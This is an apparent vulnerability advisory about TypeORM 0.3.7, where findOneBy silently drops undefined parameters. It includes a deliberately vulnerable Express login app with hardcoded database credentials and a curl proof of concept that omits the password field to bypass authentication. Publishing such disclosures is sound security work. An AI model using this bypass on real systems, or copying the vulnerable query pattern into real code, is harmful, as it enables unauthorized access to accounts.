Headline
TypeORM 0.3.7 Information Disclosure
TypeORM version 0.3.7 suffers from an information disclosure vulnerability.
I found what I think is a vulnerability in the latest typeorm 0.3.7.TypeORM v0.3 has a new findOneBy method instead of findOneById() and it isthe only way to get a record by idSending undefined as a value in this method removes this parameter from thequery. This leads to the data exposure.For example:Users.findOneBy({id: req.query.id}) with /?id=12345 produces SELECT * FROMUsers WHERE id=12345 LIMIT 1 while removing id from the query stringproduces SELECT * FROM Users LIMIT 1Maintainer also does not consider this a vulnerability and stated theroot cause is bad input validation. I tried to contact Snyk, but theytook the author's position. I still think it is a major vulnerabilityVulnerable app:import { Entity, PrimaryGeneratedColumn, Column, Connection, ConnectionOptions, Repository, createConnection} from 'typeorm';import express from 'express';import {Application, Request, Response} from 'express';let connection: Connection;async function myListener(request: Request, response: Response) { if(!connection) connection = await createConnection(connectionOpts); const userRepo: Repository<User> = connection.getRepository(User); const { email, password }: Record<string, string> = request.body; const user = await userRepo.findOneBy({ email, password }); return response.json(user ? 'ok' : 'denied');}@Entity({ name: 'Users' })class User { @PrimaryGeneratedColumn() id!: number; @Column() email!: string; @Column() password!: string;}const connectionOpts: ConnectionOptions = { type: 'mysql', name: 'myconnection', host: 'localhost', username: 'root', password: 'test123', database: 'domurl', entities: [User]}const app: Application = express();app.use(express.json());app.post( "/authenticate", myListener);app.listen(4444, () => console.log('App started'));Usage:curl http://127.0.0.1:4444/authenticate -H 'Content-Type:application/json' --data '{"email": "[email protected]", "password":"incorrect"}'"denied"⏎Exploit:curl http://127.0.0.1:4444/authenticate -H 'Content-Type:application/json' --data '{"email": "[email protected]"}'"ok"⏎